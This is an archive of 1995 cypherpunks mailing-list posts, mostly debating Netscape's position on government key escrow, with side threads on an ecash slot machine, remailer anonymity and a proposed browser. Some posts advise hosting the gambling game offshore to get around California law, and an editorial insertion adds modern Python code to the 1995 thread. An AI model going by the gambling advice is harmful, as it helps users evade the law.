> government mandated key escrow is bad.

"Our" anti-GAK position.

I would like to hear Jim Clark say "GAK is bad".

I would also like to hear him, and you, refrain from using the phrase
"key escrow" and instead use the phrase "Government Access to Keys".

I draw your attention to the fact that Bill Gates did not use the 
intentionally misleading phrase "key escrow" in his book.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:00:23 PST
To: unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512040700.XAA14483@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote:
>I see, you cannot say that they are really supporting GAK based upon
>the actual statements made, so you simply assert it.

You cannot say they oppose it either.  Jim Clark speaks about 
GAK using mostly pleasant sounding favorable words.

Let me hear him talk about GAK using plain words.



>Now given point B, I see no reason to expect that they would in the
>past have done much more than they have.  Given point C, I see they
>are currently expanding their lobbying. 

I do not see that they are currently expanding their lobbying:  Indeed
I do not see that they are currently lobbying.


>I sent a message to Netscape after reading the article that started
>this,  It simply stated that I wanted clarification on their position
>on GAK and that if they were to support it they would lose a loyal
>customer.  I have since been convinced by Jeff Weinstein's posts to
>this list that the company does not support GAK, and in fact they
>oppose it. 

I have been convinced that Jeff Weinstein opposes GAK.

If his policy represents company policy then I hope to hear
a similar statement signed authoritatively.


I have not seen that yet.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:04:27 PST
To: "E. ALLEN SMITH" <jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512040704.XAA17057@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> >   I don't believe that Netscape will ship a product that mandates GAK
> > unless it was required by law to do so.  As long as it is legal to sell
> > non-escrowed crypto products in this country or elsewhere, I think we
> > will keep doing it, because that is what our customers want.

E. ALLEN SMITH wrote:
> 	I am glad that your information leads you to this belief. However, I
> would still prefer that the official company statement include a clear section
> on this matter.

I also would like to hear this.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 95 15:23:33 PST
To: cypherpunks@toad.com
Subject: unwanted AIP mail?
Message-ID: <199512022323.AAA00288@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else suddenly start hearing from these folks?

>  Date: Fri, 1 Dec 95 14:44:34 EST
>  From: physnews@aip.org (AIP listserver)
>  Message-Id: <9512011944.AA12171@aip.org>
>  To: physnews-mailing@aip.org
>  Subject: update.250
>  X-UIDL: 817946091.001
>  
>  PHYSICS NEWS UPDATE                         
>  The American Institute of Physics Bulletin of Physics News
>  Number 250 December 1, 1995       by Phillip F. Schewe and Ben
>  Stein
>  
>  TWO-BIT QUANTUM LOGIC GATES have been experimentally {...}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: traye@ix.netcom.com (David S McDaniel )
Date: Sun, 3 Dec 95 00:35:05 PST
To: cypherpunks@toad.com
Subject: Add to List
Message-ID: <199512030834.AAA06903@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be added to your mailing list for the cypherpunks.
Thank you very much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Sun, 3 Dec 95 04:26:29 PST
To: cypherpunks@toad.com
Subject: Re: prototype slot-machine
Message-ID: <m0tMDV8-002tsfC@shoga.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Sat, 2 Dec 1995, sameer wrote:
>
>> 	I've written up a slot-machine thing for ecash, very
>> experimental, very buggy, not very slick, (i'd like to get the
>> technical bugs worked out before i put a fancy wrapper on it) and i'd
>> *like* to announce it here for testing, but I'm worrying about
>> gambling laws.. 
>> 	any thoughts?
>>

On Sun 3 Dec 1995, Attila wrote:

>	sure, just put it up on a foreign server. bahamas, caymans, etc. 
>there are several gambling bits going on from what I read. I don't gamble 
>so I never noted any addresses down, but someone should remember or have 
>it in their archives.


Try this site: Offshore Information Services in Anguilla,
http://www.offshore.com.ai/


William Knowles
printing@explicit.com


...

//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
  Graphically Explicit                     
  Printing - Advertising - Graphic Design  
  1555 Sherman Avenue - Suite 203          
  Evanston IL., 60201-4421                 
  800.570.0471 - printing@explicit.com
  Accept, Embrace, Adapt, Create     
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Sun, 3 Dec 95 16:26:12 PST
To: cypherpunks@toad.com
Subject: Pegasus Mail PGP Extensions?
Message-ID: <199512040026.RAA02724@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if there are any PGP extensions for WinPMail, and 
where to get them?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 04:08:07 PST
To: cypherpunks@toad.com
Subject: Suggestion for CP browser
Message-ID: <9512031205.AA24992@all.net>
MIME-Version: 1.0
Content-Type: text


I think a CP browser is just the ticket to change the way the world works.
How about this:

	- CP writes a browser with PGP or better quality crypto.
	- CP makes it freely available to any individual
	- CP licenses it to corporations for $1 per copy
	- Funds produced go to support worthy causes, support a permanent
		home for CP, and support anti GAK efforts (lobbying, etc.)

I think the CP browser should include an embedded language (not Java -
maybe a version of LISP) that does a far better job than Java of assuring
limitations on what programs can do.  It should also support faking the
source of a browser request (for privacy of the user), all forms of digital
cash, firewall-type forwarding, pseudonyms, and all of the other things that
CPs fight for.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Dec 95 07:50:44 PST
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512041550.HAA16441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>James A. Donald wrote:
>> I would like to hear Jim Clark say "GAK is bad".

At 11:05 PM 12/3/95 -0800, Jeff Weinstein wrote:
> I do believe that the company, Netscape, will take such a position
> in the coming week.

I will be greatly relieved when this happens.

I would be even more relieved if Netscape were to take action
to make it more difficult for the government to introduce GAK.

> Did he take a position against GAK? 

He did both less than that and considerably more than that:

Instead of trying to persuade us that he was against GAK, he sought
to persuade the reader that the reader should be against GAK.  He
sought to make it difficult for both a future Microsoft and a future
government to introduce GAK.

He described GAK in accurate language, rather than euphemistic terms.

He did not editorialize "GAK is bad" but any reasonable person 
reading his book, unfamiliar with crypto and the controversy, 
would conclude from the facts that he presented that GAK is a 
radical violation of the fourth amendment -- He described GAK 
in neutral, factually accurate language that doubtless deeply
offended the folks at NSA.

> I've been trying to use either GAK, or "mandatory key escrow" 
> to refer to the hated beast. 

"Mandatory key escrow" is still an oxymoronic euphemism.

It is not escrow if the valuable item is held by someone who 
is party to the potential conflict, or subject to the power 
of someone who is party to the potential conflict.

Even to those of us who know what the euphemism "mandatory key
escrow" stands for, it still does not sound nearly as
threatening and scary as "government access to keys".
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Dec 95 08:02:37 PST
To: John Young <cypherpunks@toad.com
Subject: Re: GAK_hit
Message-ID: <199512041603.IAA22793@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 AM 12/4/95 -0500, John Young wrote:
>   12-4-95. W$Jabber:
>
>   "Microsoft Probe Spurs Subpoenas Tied to Internet.
>   Antitrust Effort Appears Focused on Windows 95 Disabled
>   Rival Software."

>      The subpoena issued to Netscape may be of particular
>      significance. In the estimate of Netscape and industry
>      observers,


I regularly use netscape on windows 95, and I conclude that 
this subpoena is pure, 100% harassment.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 3 Dec 95 06:10:26 PST
To: solman@MIT.EDU
Subject: Re: Cypher secure versus computationally unbounded adversary
In-Reply-To: <9512021931.AA01944@ua.MIT.EDU>
Message-ID: <95Dec3.091041edt.1000@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Hi all,
> 
> I've just come up with a method for implementing an encryption algorithm
> that is absolutely secure from passive attacks by a computationally
> unbounded adversary. Is this a new capability, or am I reinventing the
> wheel here?
> 
> Thanks,
> 
> Jason W. Solinsky

That is certainly new.  In fact, I think there are proofs that say you 
can't do it.  I'm positive you can't do it if the plaintext does not
have maximum entropy.  So, tell us your scheme.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 3 Dec 95 06:35:25 PST
To: William Knowles <printing@explicit.com>
Subject: Re: prototype slot-machine
In-Reply-To: <m0tMDV8-002tsfC@shoga.wwa.com>
Message-ID: <Pine.3.89.9512030904.A26226-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



> On Sun 3 Dec 1995, Attila wrote:
> 
> 	sure, just put it up on a foreign server. bahamas, caymans, etc. 
> >there are several gambling bits going on from what I read. I don't gamble 
> >so I never noted any addresses down, but someone should remember or have 
> >it in their archives.

Or check out a whole slew of other gambling ventures at 
<http://www.casino.org>
They were in on the ecash trial, I think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 09:56:46 PST
To: printing@explicit.com (William Knowles)
Subject: Re: prototype slot-machine
In-Reply-To: <m0tMDV8-002tsfC@shoga.wwa.com>
Message-ID: <199512031751.JAA01922@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Try this site: Offshore Information Services in Anguilla,
> http://www.offshore.com.ai/

Hey, fancy that, even though gambling is illegal in California you're
saying that on a site two feet from my desk it's legal?

	cool.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 3 Dec 95 08:37:10 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
In-Reply-To: <199512030524.VAA24279@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951203113046.13147B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> As I promised, I've now opened a channel so that anyone who wants to
> can send Alice de 'nonymous email.  I can now be reached via
> an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> address will get to me, and I will do my best to reply to you as well,
> but I can't guarantee, anything.

I don't think that was a smart thing to do. Your real email is now 
registered in some database in Finland - how difficult would it be to 
retrieve it? From what I remember organizations like Scientology had no 
problem getting real emails from anon.penet.fi when they reported that 
anXXXXXX was causing trouble... couldn't the same be done for your account?
If that single system becomes compromised one day all the accounts could be 
posted on some web page somewhere and it would be a simple matter of 
looking you up! Signing your message with PGP and using Mixmaster would 
give yourself an identity while still keeping you anonymous.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 3 Dec 95 08:41:30 PST
To: sameer <sameer@c2.org>
Subject: Re: your mail
In-Reply-To: <199512030732.XAA23416@infinity.c2.org>
Message-ID: <Pine.LNX.3.91.951203113858.13147C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Competing with Netscape is obviously something that's easier said than
> > done.  But we ought to consider the strategic importance of having robust,
> 
> 	I hate to repeat myself, but sometimes people don't listen.
> http://www.c2.org/apachessl/

I don't see how you can charge for a commercial version of ApacheSSL. 
Isn't it protected by the GNU license agreement? Or is the idea that by 
registering ApacheSSL you still get the software for free but you are 
required to pay for support?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 3 Dec 95 03:54:09 PST
To: sameer <sameer@c2.org>
Subject: Re: prototype slot-machine
In-Reply-To: <199512030623.WAA17815@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951203115214.25684B@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, sameer wrote:

> 	I've written up a slot-machine thing for ecash, very
> experimental, very buggy, not very slick, (i'd like to get the
> technical bugs worked out before i put a fancy wrapper on it) and i'd
> *like* to announce it here for testing, but I'm worrying about
> gambling laws.. 
> 	any thoughts?
>
	sure, just put it up on a foreign server. bahamas, caymans, etc. 
there are several gambling bits going on from what I read. I don't gamble 
so I never noted any addresses down, but someone should remember or have 
it in their archives.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sun, 3 Dec 95 08:55:00 PST
To: fc@all.net
Subject: Re: Suggestion for CP browser
Message-ID: <199512031655.QAA25843@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 07:05:06 -0500 (EST) you wrote:

>I think a CP browser is just the ticket to change the way the world works.
>How about this:
[snip]
>	- Funds produced go to support worthy causes, support a permanent
>		home for CP, and support anti GAK efforts (lobbying, etc.)

A while back it was mentioned here that Eric Hughes set up Cypherpunk
Labs, Inc, and it was supposed to provide scholarships to
crypto-minded students and offer computational resources for those
late-night factoring sessions.  Did anything ever happen with that?  I
could use a scholarship about now...;)

>
>I think the CP browser should include an embedded language (not Java -
>maybe a version of LISP) that does a far better job than Java of assuring
>limitations on what programs can do.  It should also support faking the

I think Java is going to become a standard to run with.  It's pretty
close to C, so it isn't hard to pick up and it performs acceptably. 
While I don't mind coding in LISP or Scheme, I think most programmers
in the trenches would rather fight than recurse.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 10:58:01 PST
To: cypherpunks@toad.com
Subject: Do the Right Thing
Message-ID: <ace725d322021004ccbf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



My thesis is that both Netscape and Microsoft are in positions at this time
to either do the right thing (tm) or to help build in the tools for a
police state, an Orwellian surveillance state.

Netscape, being the dominant browser company, and Microsoft, being the
dominant OS company, are in special positions to "build in Big Brother."
I'm not claiming they are, just that they are clearly in a position to make
it technologically more feasible to make non-GAK illegal. They both need to
carefully think about the role that's been "given" to them (whether by
fortune, hard work, or being in the right place at the right time) and do
what's right.

Strong words, perhaps, but the implications of mandatory key escrow are
quite clear. We debated these points for a long time during the Clipper
debate, and later when "Software Key Escrow" began to rear its head. I
won't repeat these arguments against GAK here, but will take this
opportunity to quote from a new book that actually quotes my words:

"May, ever the idea juggler, also weighed in with some powerful arguments
_for_ PGP that appealed to a stodgy old Democrat (small "d" as well) like
me. Even the Feds should have grasped them. "Could strong crypto be used
for sick and disgusting and dangerous purposes?" May asked. And then he
answered himself: "So can locked doors, but we don't insist on an 'open
door policy' (outside of certain quaint sorority and rooming houses!). So
do many forms of privacy allow plotters, molesters, racists, etc. to meet
and plot." Whatever May was, anarchist, libertarian, objectivist, or
nothing, he was making more sense in those three sentences than Baker could
have in a 1,000 essays."

[David H. Rothman, "NetWorld! What People are Really Doing on the Internet,
and What it Means to You," Prima Publishing, 1996. Note: I don't recall
meeting Rothman, and didn't know about this book until I stumbled across it
last night in a bookstore.]

It is important that such companies as Netscape and Microsoft fully
understand that crypto policy will largely determine civil liberties in
this country and other countries for a long time to come. And they must
understand that they can influence the direction. Bill Gates, after some
early waffling, seems to now fully understand the implications of GAK and
has written persuasively against it. Jim Clark does not seem to me to have
thought about it as deeply, or perhaps has views of civil liberties which
are not at odds with mandatory key escrow, the "open door policy" mentioned
above.

And time is of the essence. Things move very fast. It is no longer the case
that a law is passed, then companies respond to the new legal regime with
their own policies and products. Companies, especially in high tech, are
"partners" from the start, as we saw with the Clipper development (where
AT&T had known about Clipper for years prior to the first public
announcement, and was cooperating in the development of it, not to mention
the other companies such as Mykotronx, VLSI Technology, etc., which were
involved in secret for years).

It is only sheer speculation on our part (some of us, at least) that
negotiations about GAK have been going on with the major software
companies. Jim Clark, for example, learned what he knows about key escrow
_someplace_, and it probably wasn't from our list or from articles he'd
read. I'm betting, but could of course be wrong, that he and other folks at
Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
been briefed on key escrow and that various negotiations are already
underway. This would match how things were done with Clipper, and would
explain Clark's voiced support for the need for GAK.

I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
high for product decisions to be made without full awareness of the
implications. The statements from Jim Clark do tend to imply a kind of
defeatism, and even Jeff's comments seemed laden with qualifications about
"only if the government requires us to." As Hal Finney noted in his post,
it's as if the Netscape people are preparing for the inevitable. Maybe it's
not an indication that GAK is being considered within Netscape, but maybe
it is. After all, one rarely hears "only if we have to" qualifications on
things that are truly from out in left field.

And what Netscape agrees to put in future releases of its browsers or its
servers could have dramatic effects on the whole climate.

(A side point, somewhat abstract: The dominance of Netscape, rising from
nowhere to becoming the major player in this debate, illustrates a point
about "monocultures" and their ecological effects. If yellow corn is good,
replace other strains of corn with yellow corn. Pretty soon, the world's
corn output is 96% yellow corn. Some ecological downsides to this. In this
case, Netscape is becoming the yellow corn of the Web, and an obvious
"choke point" for the NSA and its sisters to mandate crypto policies.
Hence, the role of non-yellow-corn alternatives...)

Should Netscape play ball with the NSA or refuse to cooperate? I'm not
suggesting that Netscape "break the law." Actually, there are *no* laws at
present about GAK or about the use of strong crypto within the U.S., and
most of us want to keep it that way. Thus, Jim Clark and Netscape could
strongly lobby for keeping things the way they are, and could even say "If
foreign governments demand GAK, let them build it in themselves--we will
not produce the software to run a police state."

And if export laws demand GAK in exported products, Netscape should "do the
right thing" and have two versions. It may add to their costs a little, but
it's better than building in the machinery for a GAK law to later be
passed.

(Explain something to me. I have never, ever understood why it is a concern
of the U.S. government that we help build in GAK for foreign governments,
that we make sure that products intended for export to France or Syria have
GAK that allows those governments to read the traffic of their citizens.
And if the concern is that exported versions of software must be readable
to the _United States_, then this is a non-starter in terms of sales in
many or even most foreign countries! I'm sure France will welcome with open
arms a version of Netscape that allows the NSA to read the traffic of
French citizens. Oh, by the way, what legal jurisdictions will be involved
in obtaining the escrowed keys of foreigners? The answers are both clear
and murky, if you catch my drift.)

If the U.S. insists on GAK _within the U.S._, as many of us fear is the
long-term danger, then all bets are off anyway. But I would hope that
Netscape does nothing to make it _easier_ to make this the case!

A viable thing for Netscape to do is to announce forthrightly that it will
separate the issue of export from what it sells in the U.S., that there
will be NO GAK included in any U.S.-sold packages. The quest for an "all
world" version, freely exportable, should not take precedence over the
civil liberties issues. And I predict that any slight losses in market
share or slight increases in product cost will be _less_ than the effects
Netscape will see if their product comes to be associated with "Big Brother
Inside."

Enough for now.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Dec 95 09:53:06 PST
To: cypherpunks@toad.com
Subject: Transatlantic Agenda
Message-ID: <199512031752.MAA29656@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone knows where to get a copy of this document -- 
especially those surely secret concordances that address the 
agenda of this list -- please whistle:


	 MADRID, Dec 3 (Reuter) - U.S. President Bill Clinton and 
European Union leaders signed on Sunday a so-called New 
Transatlantic Agenda intended as a blueprint for Euro-American 
relations into the 21st century.  

	 The document encompasses cooperation on trade, security, 
human rights, aid, democracy, health care and crime-fighting 
among other subjects.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sun, 3 Dec 95 10:02:21 PST
To: cypherpunks@toad.com
Subject: Code to detect netscape & send a message (was Re: Barring access to Netscape)
In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
Message-ID: <NAA07447.199512031802@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199512010917.DAA28429@snoopy.vetmed.auburn.edu>, Frank Stuart writes:
[...client-pull...]
>After talking to a couple of people, and playing around some, this seems
>to be a better choice.  That way, you can actually send information (including
>a list of where to get other browsers) instead of just garbage to netscape
>users.  Is anyone aware of browsers other than Netscape that do client pulls?

There is at least one.  However if you can have server-side includes, check
out: http://www.va.pubnix.com/staff/stripes/nstest.shtml

There is sample source for a netscape tester, and an example of it.

If you can't do server side includes, try this (code not written):

Add the client pull META tag to all your documents, have the client
pull "/cgi-bin/bad-mozilla-no-mozilla-biscut".  That script should
check the browser type (so it can avoid annoying users of the few
non-Mozilla browsers that do client-pull).  Remember that a browser
type of "Mozilla/1.22 (compatible; MSIE 2.0B; Windows 95)" (or similar)
is *not* netscape.  If the browser type indicates a browser type you
don't want to annoy you can just re-send the document that the PATH_TRANSLATED
env. variable points to.  If the browser type indicates a netscape product,
then you can take your choice of actions:

 * Prepend 
   "<A HREF="explain_gaK.html">netscape supports GAK, and that's bad</A>"
   to the document (you need to do slightly more than that - since you
   need to emit the normal document up to <BODY>, then your text, then
   the original document again, so you might go for the next option)
 * Append
   "<A HREF="explain_gaK.html">netscape supports GAK, and that's bad</A>"
   to the tail of the document (this works fine unless you have a
   </HTML> at the end - which almost nobody has).
 * Only give the "netscape sucks" message.  I don't think this is a good 
   idea since it is easier to hammer your point across if people keep
   seeing the message than if they can't see your page, and decide to go
   elsewhere.

[...]
>That's not a bad idea either.  Hopefully, Netscape will post a retraction
>(soon!) and none of this will be necessary.

Indeed, I hope so.  Even if the retraction is formed internally by people
going "Jim, this is going to put us at odds with the people who put up
content, and generate bad press.  It might be a better idea to try to
stand up against GAK than go with it.".  (and for the record, yes I do think
there is a significant chance that the whole GAK thing is a misinterpretation).
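
[The script the message above sketches but leaves unwritten, as an added Python example; it is not code from the post or from the nstest.shtml page it links. The function names, the document-root check on PATH_TRANSLATED and the fallback paths are assumptions of this example, and because the User-Agent header is supplied by the client the classification is only a hint.]

```python
import os
import re
import sys

# Notice text taken from the message; everything else here is illustrative.
NOTICE = '<A HREF="explain_gaK.html">netscape supports GAK, and that\'s bad</A>'

# "Mozilla/<version>" with an optional parenthesised comment after it.
_UA = re.compile(r"^Mozilla/[\d.]+\w*\s*(?:\((?P<comment>[^)]*)\))?")
_BODY_OPEN = re.compile(r"<body\b[^>]*>", re.IGNORECASE)
_TAIL = re.compile(r"</body\s*>|</html\s*>", re.IGNORECASE)


def classify_browser(user_agent):
    """Return 'netscape', 'mozilla-compatible' or 'other'.

    Browsers that only claim Mozilla compatibility put the token
    "compatible" in the comment, as in the MSIE string quoted above.
    """
    m = _UA.match(user_agent or "")
    if not m:
        return "other"
    tokens = [t.strip() for t in (m.group("comment") or "").lower().split(";")]
    if "compatible" in tokens:
        return "mozilla-compatible"
    return "netscape"


def inject_notice(document, notice=NOTICE, where="prepend"):
    """Insert the notice right after <BODY ...> or just before the closing tags.

    A page with no <BODY> tag falls back to the append path, and a page with
    no </BODY> or </HTML> gets the notice at the very end.
    """
    block = "\n<P>" + notice + "</P>\n"
    if where == "prepend":
        m = _BODY_OPEN.search(document)
        if m:
            return document[:m.end()] + block + document[m.end():]
    m = _TAIL.search(document)
    if m:
        return document[:m.start()] + block + document[m.start():]
    return document + block


def resolve_under_root(path_translated, doc_root):
    """Return the real path only if it lies inside doc_root, else None.

    PATH_TRANSLATED is derived from the request's extra path, so the script
    must not re-send a file from outside the published tree.
    """
    if not path_translated:
        return None
    root = os.path.realpath(doc_root)
    real = os.path.realpath(path_translated)
    if os.path.commonpath([root, real]) != root:
        return None
    return real


def respond(user_agent, document, where="prepend"):
    """Body to return: annotated for Netscape, unchanged for everyone else."""
    if classify_browser(user_agent) == "netscape":
        return inject_notice(document, where=where)
    return document


def main(environ, doc_root):
    """Build the full CGI response (headers plus body) as one string."""
    path = resolve_under_root(environ.get("PATH_TRANSLATED", ""), doc_root)
    if path is None or not os.path.isfile(path):
        return "Status: 404 Not Found\r\nContent-Type: text/plain\r\n\r\nnot found\n"
    with open(path, encoding="latin-1") as fh:
        document = fh.read()
    body = respond(environ.get("HTTP_USER_AGENT", ""), document)
    return "Content-Type: text/html\r\n\r\n" + body


if __name__ == "__main__":
    # Assumption: the web server exports DOCUMENT_ROOT to CGI scripts.
    root = os.environ.get("DOCUMENT_ROOT", "/var/www/html")
    sys.stdout.write(main(os.environ, root))
```
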




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sun, 3 Dec 95 11:02:22 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: toy story: more power
Message-ID: <01HYDG3GEDJM94E9C0@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

obcrypto: i'd like to see how bruter.c would have run on their
'renderfarm'.

MOUNTAIN VIEW, CALIF. (Nov. 30) BUSINESS WIRE -Nov. 30, 1995--The
making of "Toy Story," the stunning new movie from Walt Disney
Pictures that is the world's first full-length completely
computer-generated animated film, involved the use of more than 100
high-powered computers from Sun Microsystems -- which together
comprised one of the most powerful graphics rendering engines ever
created.  

=snip=

For the movie, Pixar created a networked bank or "cluster" of 117
Sun(TM) SPARCstation(TM) 20 workstations -- each containing at least
two  microprocessors, and running on Sun's Solaris(TM) operating
environment -- to handle the critical task of "rendering" each of the
114,000 frames in the 77-minute movie.  

=snip=

Sun worked closely with a team from Pixar to create its RenderFarm,
which serves as Pixar's central resource of computer processing
power.  The RenderFarm uses a network computing architecture in which
a powerful  SPARCserver(TM) 1000 acting as a "texture server"
supplies the necessary data to the many rendering client workstations
needed to complete the rendering process.  

The RenderFarm was assembled by Sun and Pixar engineers in less than a
month and drew upon Sun's own experience in setting up "farms" of
many systems linked together.  Some facts about Pixar's RenderFarm
and the computing aspects of "Toy Story":

  
   -- The RenderFarm is one of the most powerful rendering engines  
ever assembled, comprising 87 dual-processor and 30 four-processor  
SPARCstation 20s and an 8-processor SPARCserver 1000.  The RenderFarm 
has the aggregate performance of 16 billion instructions per second --
its total of 300 processors represents the equivalent of approximately
300 Cray 1 supercomputers.  
  
   -- Each system is the size of a pizza box, and all 117 systems  
work in a footprint measuring just 19 inches deep by 14 feet long by 8
feet high.  
  
   -- Sun is the price/performance leader, in Pixar's own rankings.  
The SPARCstation 20 HS14MP earned a rating of $80 per Rendermark (a  
Pixar measurement for rendering performance), while the comparable SGI
Indigo Extreme came in at approximately $150 per Rendermark.  
  
   -- Using one single-processor computer to render "Toy Story" would 
have taken 43 years of nonstop performance.  
  
   -- Each of the movie's more than 1,500 shots and 114,000 frames  
were rendered on the RenderFarm, a task that took 800,000 computer  
hours to produce the final cut.  Each frame used up 300 megabytes of 
data -- the capacity of a good-sized PC hard disk -- and required from
two to 13 hours for final processing.  
  
   -- In addition to the high-resolution final rendering, the  
RenderFarm was also used to generate the test images animators needed 
to plan and evaluate lighting, texture mapping and animation.  Since 
fast response is key in doing tests, RenderMan could produce test  
frames in as little as a few seconds.  
  
   -- Scalability is built-in:  the RenderFarm can be upgraded  (with
more processors and disk storage) to a nearly four-fold  performance
level, without requiring any additional space.  The  RenderFarm also
integrates seamlessly with Pixar's existing computer  network
containing different types of machines.  

=snip=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
